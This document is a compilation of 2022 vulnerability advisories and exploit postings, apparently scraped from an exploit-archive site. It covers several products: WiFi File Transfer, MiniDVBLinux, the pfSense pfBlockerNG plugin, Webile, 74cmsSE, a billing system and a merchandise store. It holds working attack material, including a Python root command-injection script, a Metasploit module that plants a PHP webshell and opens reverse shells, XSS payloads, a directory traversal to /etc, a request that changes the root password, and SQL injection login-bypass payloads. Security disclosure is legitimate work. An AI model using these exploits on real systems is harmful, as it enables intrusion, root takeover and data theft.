WiFi File Transfer version 1.0.8 suffers from a cross site scripting vulnerability.

Document Title:  
===============  
WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities

References (Source):  
====================  
https://www.vulnerability-lab.com/get_content.php?id=2322

Release Date:  
=============  
2022-10-17

Vulnerability Laboratory ID (VL-ID):  
====================================  
2322

Common Vulnerability Scoring System:  
====================================  
5.6

Vulnerability Class:  
====================  
Cross Site Scripting - Persistent

Current Estimated Price:  
========================  
500€ - 1.000€

Product & Service Introduction:  
===============================  
WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required.

(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US  )

Abstract Advisory Information:  
==============================  
The vulnerability laboratory core research team discovered a multiple persistent cross site vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application.

Affected Product(s):  
====================  
smarterDroid  
Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)

Vulnerability Disclosure Timeline:  
==================================  
2022-10-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:  
=================  
Published

Exploitation Technique:  
=======================  
Remote

Severity Level:  
===============  
Medium

Authentication Type:  
====================  
Open Authentication (Anonymous Privileges)

User Interaction:  
=================  
Low User Interaction

Disclosure Type:  
================  
Independent Security Research

Technical Details & Description:  
================================  
A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android.  
The vulnerability allows remote attackers to inject own malicious script codes with persistent attack vector to compromise browser to web-application  
requests from the application-side.

The vulnerabilities are located in the data_file parameter of the add a file or folder and create a zip file function.  
Attackers with wifi access are able to anonymous use the webui and can inject own malicious script code with persistent  
attack vector via post method request.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external  
redirects to malicious source and persistent manipulation of affected application modules.

Proof of Concept (PoC):  
=======================  
The persistent post inject web vulnerabilities can be exploited by remote attackers in the same wifi network with anonymous privileges and low user interaction.  
For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue.

Manual reproduce of the vulnerability ...  
1. Install the mobile android application and start it  
2. Start the wifi web-server  
3. Login as attacker by the browser over the network  
4. Inject payload as folder name, file name or zip file and save via post method request  
5. The payload executes in the web ui when previewing the paths

Exploitation: Payload  
<a onmouseover=alert(document.cookie)>picture1337.jpg</a>

--- PoC Session Logs #1 (POST) [Add] [Create] [Folder] [data_file] ---  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------321836412920954805143620932676  
Content-Length: 613  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
action=mkdir&data_file=New"><a onmouseover=alert(document.cookie)>picture1337.jpg</a>&data_currentParams=?&data_filepath=/storage/emulated/0/DCIM/  
-  
POST: HTTP/1.1 302 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/DCIM/  
Content-Length: 143  
-  
http://localhost:1234/storage/emulated/0/DCIM/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/DCIM/  
Connection: keep-alive  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

--- PoC Session Logs #2 (POST) [Add] [Create] [Zip] [data_file] ---  
http://localhost:1234/storage/emulated/0/Pictures/?  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Content-Type: multipart/form-data; boundary=---------------------------289297208414223233314228108045  
Content-Length: 882  
Origin:http://localhost:1234  
Connection: keep-alive  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Upgrade-Insecure-Requests: 1  
action=multizip&data_file=.<a onmouseover=alert(document.cookie)>File.Zip</a>.Zip&data_currentParams=?&data_filepath=/storage/emulated/0/Pictures/&1.jpg=file&2.jpg=file  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html  
Location:http://localhost:1234/storage/emulated/0/Pictures/  
Content-Length: 151  
-  
http://localhost:1234/storage/emulated/0/Pictures/  
Host: localhost:1234  
Accept-Encoding: gzip, deflate  
Referer:http://localhost:1234/storage/emulated/0/Pictures/?  
Connection: keep-alive  
Upgrade-Insecure-Requests: 1  
-  
POST: HTTP/1.1 200 OK  
Connection: Close  
Content-Type: text/html

Reference(s):  
http://localhost:1234/  
http://localhost:1234/storage/  
http://localhost:1234/storage/emulated/  
http://localhost:1234/storage/emulated/0/  
http://localhost:1234/storage/emulated/0/DCIM/  
http://localhost:1234/storage/emulated/0/Pictures/

Solution - Fix & Patch:  
=======================  
The persistent web vulnerabilities can be resolved by the following steps ...  
1. Restrict the input of the folder, filename and zip files to disallow special chars for add or create process  
2. Encode and escape the content of the data_file parameter to sanitize the content  
3. Sanitize and filter the output locations of the explorer path listings to prevent further attacks

Security Risk:  
==============  
The security risk of the persistent web vulnerabilities in the mobile android wifi web-application are estimated as medium.

Credits & Authors:  
==================  
Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab

Disclaimer & Information:  
=========================  
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,  
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab  
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits  
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do  
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.  
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.com

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.  
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other  
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other  
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or  
edit our material contact (admin@ or research@) to get a ask permission.

            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™

--   
VULNERABILITY LABORATORY (VULNERABILITY LAB)  
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

WiFi File Transfer 1.0.8 Cross Site Scripting

MiniDVBLinux version 5.4 suffers from an OS command injection vulnerability. This can be exploited to execute arbitrary commands with root privileges.

    #!/usr/bin/env python3### MiniDVBLinux 5.4 Remote Root Command Injection Vulnerability### Vendor: MiniDVBLinux# Product web page: https://www.minidvblinux.de# Affected version: <=5.4## Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple# way to convert a standard PC into a Multi Media Centre based on the# Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this# Linux based Digital Video Recorder: Watch TV, Timer controlled# recordings, Time Shift, DVD and MP3 Replay, Setup and configuration# via browser, and a lot more. MLD strives to be as small as possible,# modular, simple. It supports numerous hardware platforms, like classic# desktops in 32/64bit and also various low power ARM systems.## Desc: The application suffers from an OS command injection vulnerability.# This can be exploited to execute arbitrary commands with root privileges.## Tested on: MiniDVBLinux 5.4#            BusyBox v1.25.1#            Architecture: armhf, armhf-rpi2#            GNU/Linux 4.19.127.203 (armv7l)#            VideoDiskRecorder 2.4.6### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic#                             @zeroscience### Advisory ID: ZSL-2022-5717# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5717.php### 24.09.2022#import requestsimport re,sys#test case 001#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT#test case 004#http://ip:8008/?site=about&name=blind&file=$(id)#cat: can't open 'uid=0(root)': No such file or directory#cat: can't open 'gid=0(root)': No such file or directory#test case 005#http://ip:8008/?site=about&name=blind&file=`id`#cat: can't open 'uid=0(root)': No such file or directory#cat: can't open 'gid=0(root)': No such file or directoryif len(sys.argv) < 3:  print('MiniDVBLinux 5.4 Command Injection PoC')  print('Usage: ./mldhd_root2.py [url] [cmd]')  sys.exit(17)else:    url = sys.argv[1]    cmd = sys.argv[2]req = requests.get(url+'/?site=about&name=ZSL&file=$('+cmd+')')outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()print(outz.replace('<pre>','').replace('</pre>',''))

MiniDVBLinux 5.4 Remote Root Command Injection

This Metasploit module leverages a remote shell upload vulnerability in pfSense pfBlockerNG plugin versions 2.1.4_26 and below. Note that version 3.x is unaffected.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'pfSense plugin pfBlockerNG unauthenticated RCE as root',        'Description' => %q{          pfBlockerNG is a popular pfSense plugin that is not installed by default. It’s generally used to          block inbound connections from whole countries or IP ranges. Versions 2.1.4_26 and below are affected          by an unauthenticated RCE vulnerability that results in root access. Note that version 3.x is unaffected.        },        'Author' => [          'IHTeam', # discovery          'jheysel-r7' # module        ],        'References' => [          [ 'CVE', '2022-31814' ],          [ 'URL', 'https://www.ihteam.net/advisory/pfblockerng-unauth-rce-vulnerability/']        ],        'License' => MSF_LICENSE,        'Platform' => 'unix',        'Privileged' => false,        'Arch' => [ ARCH_CMD ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_openssl'              }            }          ],          [            'BSD Dropper',            {              'Platform' => 'bsd',              'Arch' => [ARCH_X64],              'Type' => :bsd_dropper,              'CmdStagerFlavor' => [ 'curl' ],              'DefaultOptions' => {                'PAYLOAD' => 'bsd/x64/shell_reverse_tcp'              }            }          ]        ],        'DefaultTarget' => 1,        'DisclosureDate' => '2022-09-05',        'DefaultOptions' => {          'SSL' => true,          'RPORT' => 443        },        'Notes' => {          'Stability' => [ CRASH_SERVICE_DOWN ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION, ]        }      )    )    register_options(      [        OptString.new('WEBSHELL_NAME', [          false, 'The name of the uploaded webshell sans the ".php" ending. This value will be randomly generated if left unset.', nil        ])      ]    )  end  def upload_shell    print_status 'Uploading shell...'    if datastore['WEBSHELL_NAME'].blank?      @webshell_name = "#{Rex::Text.rand_text_alpha(8..16)}.php"    else      @webshell_name = "#{datastore['WEBSHELL_NAME']}.php"    end    @parameter_name = Rex::Text.rand_text_alpha(4..12)    print_status("Webshell name is: #{@webshell_name}")    web_shell_contents = <<~EOF      <?php echo file_put_contents('/usr/local/www/#{@webshell_name}','<?php echo(passthru($_POST["#{@parameter_name}"]));');    EOF    encoded_php = web_shell_contents.unpack('H*')[0].upcase    send_request_raw(      'uri' => normalize_uri(target_uri.path, '/pfblockerng/www/index.php'),      'headers' => {        'Host' => "' *; echo '16i #{encoded_php} P' | dc | php; '"      }    )    sleep datastore['WfsDelay']    register_file_for_cleanup("/usr/local/www/#{@webshell_name}")  end  def check    upload_shell    check_resp = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, "/#{@webshell_name}"),      'vars_post' => {        @parameter_name.to_s => 'id'      }    )    return Exploit::CheckCode::Safe('Error uploading shell, the system is likely patched.') if check_resp.nil? || check_resp.body.nil? || !check_resp.body.include?('uid=0(root) gid=0(wheel)')    Exploit::CheckCode::Vulnerable  end  def execute_command(cmd, _opts = {})    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, @webshell_name),      'headers' => {        'Content-Encoding' => 'application/x-www-form-urlencoded; charset=UTF-8'      },      'vars_post' => {        @parameter_name.to_s => cmd      }    })  end  def exploit    upload_shell unless datastore['AutoCheck']    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :bsd_dropper      execute_cmdstager    end  endend

pfSense pfBlockerNG 2.1.4_26 Shell Upload

Webile version 1.0.1 suffers from a directory traversal vulnerability.

    Document Title:===============Webile v1.0.1 - Directory Traversal Web VulnerabilityReferences (Source):====================https://www.vulnerability-lab.com/get_content.php?id=2320Release Date:=============2022-10-10Vulnerability Laboratory ID (VL-ID):====================================2320Common Vulnerability Scoring System:====================================7.3Vulnerability Class:====================Directory- or Path-TraversalCurrent Estimated Price:========================1.000€ - 2.000€Product & Service Introduction:===============================Webile, is a local area network cross-platform file management tool based on http protocol. Using the personal mobile phone as a server inthe local area network, browsing mobile phone files, uploading files, downloading files, playing videos, browsing pictures, transmitting data,statistics files, displaying performance, etc. No need to connect to the Internet, you can browse files, send data, play videos and otherfunctions through WiFi LAN or mobile phone hotspot, and no additional data traffic will be generated during data transmission. Support Mac,Windows, Linux, iOS, Android and other multi-platform operating systems.(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.wifile.webile&hl=en&gl=US  )Abstract Advisory Information:==============================The vulnerability laboratory core research team discovered a directory traversal web vulnerability in the Webile v1.0.1 Wifi mobile web application.Affected Product(s):====================Product Owner: WebileProduct: Webile v1.0.1 - (Framework) (Mobile Web-Application)Vulnerability Disclosure Timeline:==================================2022-02-06: Researcher Notification & Coordination (Security Researcher)2022-02-07: Vendor Notification (Security Department)2022-**-**: Vendor Response/Feedback (Security Department)2022-**-**: Vendor Fix/Patch (Service Developer Team)2022-**-**: Security Acknowledgements (Security Department)2022-10-10: Public Disclosure (Vulnerability Laboratory)Discovery Status:=================PublishedExploitation Technique:=======================RemoteSeverity Level:===============HighAuthentication Type:====================Open Authentication (Anonymous Privileges)User Interaction:=================No User InteractionDisclosure Type:================Independent Security ResearchTechnical Details & Description:================================A directory traversal web vulnerability has been discovered  in the Webile v1.0.1 wifi mobile web application.The vulnerability allows remote attackers to change the application path in performed requests to compromise thelocal application or file-system of a mobile device. Attackers are for example able to request environmentvariables or a sensitive system path.The directory-traversal web vulnerability is located in the insecure web-server configuration. The path of the local user is notsecure restricted and validated. Thus allows an unauthenticated user with wifi access to request local web-server files withoutsecure permission. The bug itself is located in the filepath parameter of the change_upload_dir function.Exploitation of the directory traversal web vulnerability requires no privileged web-application user account or user interaction.Successful exploitation of the vulnerability results in information leaking by unauthorized file access and mobile application compromise.Proof of Concept (PoC):=======================The directory traversal web vulnerability can be exploited by remote attackers without user account or user interaction.For security demonstration or to reproduce the web vulnerability follow the provided information and steps below to continue.PoC: Exploitationhttp://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/--- PoC Session Logs ---http://localhost:8080/webile_select_dir?t=change_upload_dir&filepath=../../../../../../../../../../../../etc/Host: localhost:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateConnection: keep-aliveCookie: treeview=0; sessionId=b21814d80862de9a06b7086cc737dae6Upgrade-Insecure-Requests: 1-GET: HTTP/1.1 200 OKContent-Type: text/html; charset=UTF-8Connection: keep-aliveContent-Encoding: gzipTransfer-Encoding: chunked--- FS Session Logs ---Output:File name   bluetoothbpfcarriercompatconfiginitpermissionspppseccomp_policysecurityselinuxsensorssysconfigtextclassifierthemevintfepdgipmSecurity Risk:==============The security risk of the directory traversal web vulnerability in the mobile web application is estimated as high.Credits & Authors:==================Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-LabDisclaimer & Information:=========================The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Labor its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profitsor special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states donot allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.Domains:   https://www.vulnerability-lab.com  ;  https://www.vuln-lab.com  ;https://www.vulnerability-db.comAny modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of othermedia, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and otherinformation on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use oredit our material contact (admin@ or research@) to get a ask permission.            Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™-- VULNERABILITY LABORATORY (VULNERABILITY LAB)RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

Webile 1.0.1 Directory Traversal

MiniDVBLinux versions 5.4 and below suffer from an unauthenticated live stream disclosure when /tpl/tv_action.sh is called and generates a snapshot in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).

    MiniDVBLinux 5.4 Unauthenticated Stream Disclosure VulnerabilityVendor: MiniDVBLinuxProduct web page: https://www.minidvblinux.deAffected version: <=5.4Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simpleway to convert a standard PC into a Multi Media Centre based on theVideo Disk Recorder (VDR) by Klaus Schmidinger. Features of thisLinux based Digital Video Recorder: Watch TV, Timer controlledrecordings, Time Shift, DVD and MP3 Replay, Setup and configurationvia browser, and a lot more. MLD strives to be as small as possible,modular, simple. It supports numerous hardware platforms, like classicdesktops in 32/64bit and also various low power ARM systems.Desc: The application suffers from an unauthenticated live streamdisclosure when /tpl/tv_action.sh is called and generates a snapshotin /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).--------------------------------------------------------------------/var/www/tpl/tv_action.sh:--------------------------01: #!/bin/sh02:03: header04:05: quality=6006: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=$.*$&height=$.*$/\1 \2/g")"07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null--------------------------------------------------------------------Tested on: MiniDVBLinux 5.4           BusyBox v1.25.1           Architecture: armhf, armhf-rpi2           GNU/Linux 4.19.127.203 (armv7l)           VideoDiskRecorder 2.4.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5716Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php24.09.2022--1. Generate screengrab: - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*" - Response: 220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8250 Grabbed image /tmp/tv.jpg 60221 mld closing connection2. View screengrab: - Request: curl http://ip:8008/images/tv.jpg3. Or use a browser: - http://ip:8008/home?site=remotecontrol

MiniDVBLinux 5.4 Unauthenticated Stream Disclosure

MiniDVBLinux versions 5.4 and below root password changing proof of concept exploit.

    MiniDVBLinux 5.4 Change Root Password PoCVendor: MiniDVBLinuxProduct web page: https://www.minidvblinux.deAffected version: <=5.4Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simpleway to convert a standard PC into a Multi Media Centre based on theVideo Disk Recorder (VDR) by Klaus Schmidinger. Features of thisLinux based Digital Video Recorder: Watch TV, Timer controlledrecordings, Time Shift, DVD and MP3 Replay, Setup and configurationvia browser, and a lot more. MLD strives to be as small as possible,modular, simple. It supports numerous hardware platforms, like classicdesktops in 32/64bit and also various low power ARM systems.Desc: The application allows a remote attacker to change the rootpassword of the system without authentication (disabled by default)and verification of previously assigned credential. Command executionalso possible using several POST parameters.Tested on: MiniDVBLinux 5.4           BusyBox v1.25.1           Architecture: armhf, armhf-rpi2           GNU/Linux 4.19.127.203 (armv7l)           VideoDiskRecorder 2.4.6Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2022-5715Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5715.php24.09.2022--Default root password: mld500Change system password:-----------------------POST /?site=setup&section=System HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6Cache-Control: max-age=0Connection: keep-aliveContent-Length: 778Content-Type: application/x-www-form-urlencodedCookie: fadein=true; sessid=fb9b4f16b50c4d3016ef434c760799fc; PHPSESSID=jbqjvk5omsb6pbpas78ll57qnpmvb4st7fk3r7slq80ecrdsubebn31tptjhvfbaHost: ip:8008Origin: http://ip:8008Referer: http://ip:8008/?site=setup&section=SystemUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36sec-gpc: 1APT_UPGRADE_CHECK=1&APT_SYSTEM_ID=1&APT_PACKAGE_CLASS_command=%2Fetc%2Fsetup%2Fapt.sh+setclass&APT_PACKAGE_CLASS=stable&SYSTEM_NAME=MiniDVBLinux&SYSTEM_VERSION_command=%2Fetc%2Fsetup%2Fbase.sh+setversion&SYSTEM_VERSION=5.4&SYSTEM_PASSWORD_command=%2Fetc%2Fsetup%2Fbase.sh+setpassword&SYSTEM_PASSWORD=r00t&BUSYBOX_ACPI_command=%2Fetc%2Fsetup%2Fbusybox.sh+setAcpi&BUSYBOX_NTPD_command=%2Fetc%2Fsetup%2Fbusybox.sh+setNtpd&BUSYBOX_NTPD=1&LOG_LEVEL=1&SYSLOG_SIZE_command=%2Fetc%2Fsetup%2Finit.sh+setsyslog&SYSLOG_SIZE=&LANG_command=%2Fetc%2Fsetup%2Flocales.sh+setlang&LANG=en_GB.UTF-8&TIMEZONE_command=%2Fetc%2Fsetup%2Flocales.sh+settimezone&TIMEZONE=Europe%2FKumanovo&KEYMAP_command=%2Fetc%2Fsetup%2Flocales.sh+setkeymap&KEYMAP=de-latin1&action=save&params=&changed=SYSTEM_PASSWORD+Pretty post data:APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: r00tBUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/KumanovoKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: SYSTEM_PASSWORD Eenable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1WEBIF_PASSWORD_CHECK: 1action: saveparams: changed: WEBIF_PASSWORD_CHECK Disable webif password check:-----------------------------POST /?site=setup&section=System HTTP/1.1APT_UPGRADE_CHECK: 1APT_SYSTEM_ID: 1APT_PACKAGE_CLASS_command: /etc/setup/apt.sh setclassAPT_PACKAGE_CLASS: stableSYSTEM_NAME: MiniDVBLinuxSYSTEM_VERSION_command: /etc/setup/base.sh setversionSYSTEM_VERSION: 5.4SYSTEM_PASSWORD_command: /etc/setup/base.sh setpasswordSYSTEM_PASSWORD: BUSYBOX_ACPI_command: /etc/setup/busybox.sh setAcpiBUSYBOX_NTPD_command: /etc/setup/busybox.sh setNtpdBUSYBOX_NTPD: 1LOG_LEVEL: 1SYSLOG_SIZE_command: /etc/setup/init.sh setsyslogSYSLOG_SIZE: LANG_command: /etc/setup/locales.sh setlangLANG: en_GB.UTF-8TIMEZONE_command: /etc/setup/locales.sh settimezoneTIMEZONE: Europe/BerlinKEYMAP_command: /etc/setup/locales.sh setkeymapKEYMAP: de-latin1action: saveparams: changed: WEBIF_PASSWORD_CHECK

MiniDVBLinux 5.4 Change Root Password

74cmsSE v3.12.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the component /apiadmin/notice/add. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Title field.

Vulnerability Name: Storage cross site scripting vulnerability(XSS)

Date of Discovery: 23/9/2022

Product version： 74cmsSEv3.12.0 DownloadLink : https://www.74cms.com/download/detail/89.html

Author: xxhzz

Vulnerability Description:  
Add a bulletin to the background of 74cmSSE V3.12.0. Insert the XSS Payload into the header to store and trigger the XSS

Prove:  
1.In the background of the website, add a bulletin and insert payload in the header  
payload: {{$on.constructor('alert(1)')()}}  
  
  
2.Check the parameter and find title  
  
3.Save success  
  
4.Click the title to trigger the XSS successfully  

code:  
Position: \\74cmsSEv3.12.0\\upload\\application\\apiadmin\\controller\\Notice.php  
  
Check the xss parameter filtering mechanism and escape only the angle brackets  
  
I am using AngularJS sandbox escapes reflected.Therefore, the storage xss vulnerability was successfully triggered.

CVE-2022-41472: 74cmsSE Storage cross site scripting vulnerability(XSS) · Issue #1 · xxhzz1/74cmsSE-Storage-cross-site-scripting-vulnerability

Billing System Project v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /phpinventory/editbrand.php.

Permalink

**Billing System Project v1.0 by mayuri\_k has SQL injection**

BUG\_Author: AuriGe

Login account: mayurik/rootadmin (Super Admin account)

vendors: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /phpinventory/editbrand.php?id=

Vulnerability location: /phpinventory/editbrand.php?id=, id

dbname = store1,length=6

\[+\] Payload: /phpinventory/editbrand.php?id=-1%27%20union%20select%201,database(),3,4--+ // Leak place ---> id

GET /phpinventory/editbrand.php?id\=\-1%27%20union%20select%201,database(),3,4\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=5g4g4dffu1bkrg9jm7nr42ori2
Connection: close

CVE-2022-41498: bug_report/SQLi-1.md at main · aurigee/bug_report

An arbitrary file upload vulnerability in the component /apiadmin/upload/attach of 74cmsSE v3.13.0 allows attackers to execute arbitrary code via a crafted PHP file.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-42154: 74cmsSE Arbitrary file upload vulnerability · Issue #1 · xxhzz1/74cmsSE-Arbitrary-file-upload-vulnerability

A SQL Injection issue in Merchandise Online Store v.1.0 allows an attacker to log in to the admin account.

\# Exploit Title: Merchandise Online Store System - SQL Injection "Unauthorized Admin Access"

\# Exploit Author: Pratik Shetty

\# Vendor Name: oretnom23

\# Vendor Homepage: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

\# Software Link: https://www.sourcecodester.com/php/14887/merchandise-online-store-php-free-source-code.html

\# Version: v1.0

\# Tested on: Parrot GNU/Linux 4.10, Apache

\# CVE: CVE-2022-42237

Description:-

An SQL injection issue in Merchandise Online Store System v.1.0 allows an attacker to logi in into admin account.

\`

Payload used:-

admin' or 1=1

\`

Parameter:-

Username and Password

\`

Steps to reproduce:-

1\. First go the admin login

2\. From there in username and password put the payload

Payload:

admin' or 1=1

3\. Now press enter and we get logged in into admin account

Tag

#php